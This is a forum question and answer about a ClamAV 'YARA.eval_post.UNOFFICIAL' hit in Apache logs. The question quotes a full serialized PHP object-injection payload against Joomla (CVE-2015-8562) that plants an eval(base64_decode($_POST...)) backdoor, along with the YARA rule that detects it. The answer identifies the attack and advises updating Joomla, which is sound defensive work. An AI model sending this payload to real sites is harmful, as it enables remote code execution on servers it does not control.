What is YARA.eval_post.UNOFFICIAL and what should I do about it?

Question

My ClamAV scan keeps finding examples of this in my Apache logs: YARA.eval_post.UNOFFICIAL

Does anyone know what it is and what to do about it?

I tried contacting the folks at yararules.com, but I haven't heard anything back.

My log entries look like this:

160.202.162.212 - - [13/Jul/2017:05:53:12 -0400] "GET / HTTP/1.1" 503 299 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\xf0\x9d\x8c\x86"

The Yara rule that applies says this:

rule eval_post {
    strings:
        $ = "eval(base64_decode($_POST"
        $ = "eval($undecode($tongji))"
        $ = "eval($_POST"
    condition: any of them
}

Answer 1

What is YARA.eval_post.UNOFFICIAL

First, it is a YARA rule, which means that ClamAV has found something it categorizes as malware.

"UNOFFICIAL" part means just that ClamAV finding here is "unofficial" and that is the case when detection of malware is result of any non-built-in/default signature. Most probably you are using clamav-unofficial-sigs.

What your log entry about is

"The Joomla Unserialize Vulnerability" (CVE-2015-8562), a method of utilizing a malicious content in HTTP request. Basically, someone is trying to perform a well-known type of attack to your site. Be sure if you are using Joomla that it is up to date to stay protected.

Last but not least, it seems like you have scanned apache's log file and it has found eval(base64_decode($_POST[111])); (as you can see attempt yo execute whatever is content of POST http request). Log file itself does not pose security treat in any way.